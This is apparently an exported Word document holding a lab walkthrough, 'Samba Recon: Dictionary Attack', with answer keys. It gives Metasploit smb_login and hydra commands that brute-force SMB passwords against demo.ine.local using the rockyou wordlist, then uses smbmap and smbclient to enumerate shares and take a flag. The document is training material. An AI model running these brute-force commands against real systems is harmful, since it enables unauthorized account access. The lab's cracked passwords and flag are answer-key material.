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A3A60" w14:textId="5C8E3025" w:rsidR="00853ABF" w:rsidRPr="005515C8" w:rsidRDefault="005D7543">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005515C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Samba Recon: Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193D153" w14:textId="77777777" w:rsidR="005D7543" w:rsidRDefault="005D7543"/>
    <w:p w14:paraId="16B30C9A" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF72059" w14:textId="2327491C" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52544D15" wp14:editId="1327E5D9">
            <wp:extent cx="5943600" cy="3583940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="370212407" name="Picture 20" descr="Conten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Content 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8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0DD36" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> What is the password of user “jane” required to access share “jane”? Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smb_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> module with password wordlist /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253233C" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Answer: abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B5444" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C99A1" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EC009" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smb_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0099C734" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>set PASS_FILE /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267BD6A1" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5B5ED" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42814FD4" w14:textId="77777777" w:rsidR="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC9C74" w14:textId="5937DD88" w:rsidR="005515C8" w:rsidRPr="005D7543" w:rsidRDefault="005515C8" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3A9601" wp14:editId="1C8F8E5A">
            <wp:extent cx="5778797" cy="3086259"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1606618419" name="Picture 2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618419" name="Picture 21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8797" cy="3086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04A82" w14:textId="0D5D6532" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="003D3216" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FFE44A" wp14:editId="47326D1E">
            <wp:extent cx="5727994" cy="1320868"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1480855825" name="Picture 22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855825" name="Picture 22" descr="A screen shot of a computer code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994" cy="132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2923C" w14:textId="5D914AD1" w:rsidR="003D3216" w:rsidRDefault="003D3216" w:rsidP="005D754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9F01B2E" wp14:editId="67B97A80">
            <wp:extent cx="5937555" cy="3511730"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="654087858" name="Picture 2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087858" name="Picture 23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7555" cy="35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75CE8" w14:textId="7490F136" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t> What is the password of user “admin” required to access share “admin”? Use hydra with password wordlist: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3F78A" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Answer: password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC3901" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3CD54" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -d /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8F3EB" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">/share/wordlists/rockyou.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E12677E" w14:textId="788AB877" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="003D3216" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD3B825" wp14:editId="007BD76B">
            <wp:extent cx="5855001" cy="4102311"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1125673819" name="Picture 24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673819" name="Picture 24" descr="A computer screen shot of a computer program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5001" cy="4102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946E9" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> Which share is read only? Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> with credentials obtained in question 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC20EF7" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>nancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EC50E05" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7C323" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -u admin -p password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5F014" w14:textId="4018E6DB" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="003D3216" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165D3FFF" wp14:editId="4AAFCE01">
            <wp:extent cx="5867702" cy="4159464"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1325599788" name="Picture 25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599788" name="Picture 25" descr="A screen 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7702" cy="4159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84C53" w14:textId="0A274173" w:rsidR="003D3216" w:rsidRDefault="003D3216" w:rsidP="005D7543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1F069F2C" wp14:editId="49AB2D0F">
            <wp:extent cx="5848651" cy="4172164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2067053416" name="Picture 26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053416" name="Picture 26" descr="A screenshot of a computer program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8651" cy="417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80B5A" w14:textId="557EEBC8" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> Is share “jane” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>browseable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>? Use credentials obtained from the 1st question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F85E9A" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Answer: no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A520ACB" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Solution: Listing the shares on the samba server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2874E736" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6D7D0" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> -U jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78220E31" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Enter password "abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D876084" w14:textId="060B756F" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="003D3216" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A4E531" wp14:editId="47132B40">
            <wp:extent cx="5575587" cy="2781443"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="992051549" name="Picture 2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051549" name="Picture 27" descr="A screen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5587" cy="278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E8563" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Share "jane" is not listed. Checking whether jane share exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA01436" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B342F02" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/jane -U jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC664D" w14:textId="70755B68" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="003D3216" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6140886F" wp14:editId="44A6E9AC">
            <wp:extent cx="5842300" cy="2019404"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="552446935" name="Picture 28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446935" name="Picture 28" descr="A screen shot of a computer code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300" cy="2019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D5424" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Share “Jane” exists but is not browsable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1BD72" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t> Fetch the flag from share “admin”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8DAC7B" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>Answer: 2727069bc058053bd561ce372721c92e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1EE470" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482EA342" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>/admin -U admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039FD82" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF3899" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>cd hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB0D4A" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:lastRenderedPageBreak/>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7169A333" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>get flag.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6DB20" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283167B7" w14:textId="4ED8C471" w:rsidR="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D7543">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00617110">
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7543">
        <w:t>f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D7543">
        <w:t xml:space="preserve"> flag.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FABD0" w14:textId="41DED227" w:rsidR="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF03619" w14:textId="482B52AE" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>  -x :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t>tract files from an archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50581EDE" w14:textId="15A8865A" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>z :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> filter the archive through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> (decompress .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>gz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA516EB" w14:textId="36E2F7A2" w:rsidR="00617110" w:rsidRPr="00617110" w:rsidRDefault="00617110" w:rsidP="00617110">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00617110">
        <w:t>flag.tar.gz :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve">ollowed by the archive </w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file name</w:t>
      </w:r>
      <w:r w:rsidRPr="00617110">
        <w:t xml:space="preserve"> to operate on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AF908" w14:textId="5B6D2144" w:rsidR="00617110" w:rsidRPr="005D7543" w:rsidRDefault="00617110" w:rsidP="005D7543">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64B286" w14:textId="77777777" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:t>cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54216664" w14:textId="760DF918" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="00617110" w:rsidP="005D7543">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111A02D6" wp14:editId="4B9378C4">
            <wp:extent cx="5785147" cy="3378374"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1428572633" name="Picture 29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572633" name="Picture 29" descr="A computer screen shot of a black screen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5147" cy="337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CC616" w14:textId="2051929B" w:rsidR="00617110" w:rsidRDefault="00617110" w:rsidP="005D754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4720053" wp14:editId="280886CA">
            <wp:extent cx="3651438" cy="1257365"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1111067864" name="Picture 30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067864" name="Picture 30" descr="A computer screen with white text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1438" cy="125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1EE82" w14:textId="738CD037" w:rsidR="005D7543" w:rsidRPr="005D7543" w:rsidRDefault="005D7543" w:rsidP="005D7543">
      <w:r w:rsidRPr="005D7543">
        <w:rPr>
          <w:b/>
          <w:bCs/>
